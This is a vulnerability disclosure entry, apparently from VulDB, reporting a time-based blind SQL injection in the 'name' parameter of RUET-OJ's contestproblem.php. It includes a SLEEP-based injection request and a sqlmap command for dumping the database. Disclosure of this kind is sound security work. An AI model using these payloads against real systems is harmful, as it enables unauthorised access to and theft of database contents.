| 제목 | shawon100 RUET-OJ BETA 2016 Time Based Blind SQL Injection - contestproblem.php |
|---|
| 설명 | There is a Time Based Blind SQL Injection vulnerability in the "name" parameter of the contestproblem.php file, allowing an attacker to dump the entire database. You must be authenticated
[POC]
With burp proxy: GET /contestproblem.php?name='+AND+(SELECT+1+FROM+(SELECT+SLEEP(5))x)+AND+'1'%3d'1
Automate with sqlmap to perform the database dump.
sqlmap -u http://ip/contestproblem.php?name= --cookie=PHPSESSID=f1cc07f2b44446f48035e77e8184cec7 -D reg --tables
The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response.
Link application: https://github.com/shawon100/RUET-OJ |
|---|
| 사용자 | ManinhuGuitar (UID 84672) |
|---|
| 제출 | 2025. 10. 14. AM 01:40 (6 개월 ago) |
|---|
| 모더레이션 | 2025. 10. 27. AM 11:22 (13 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 330105 [shawon100 RUET OJ 까지 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 /contestproblem.php 이름 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|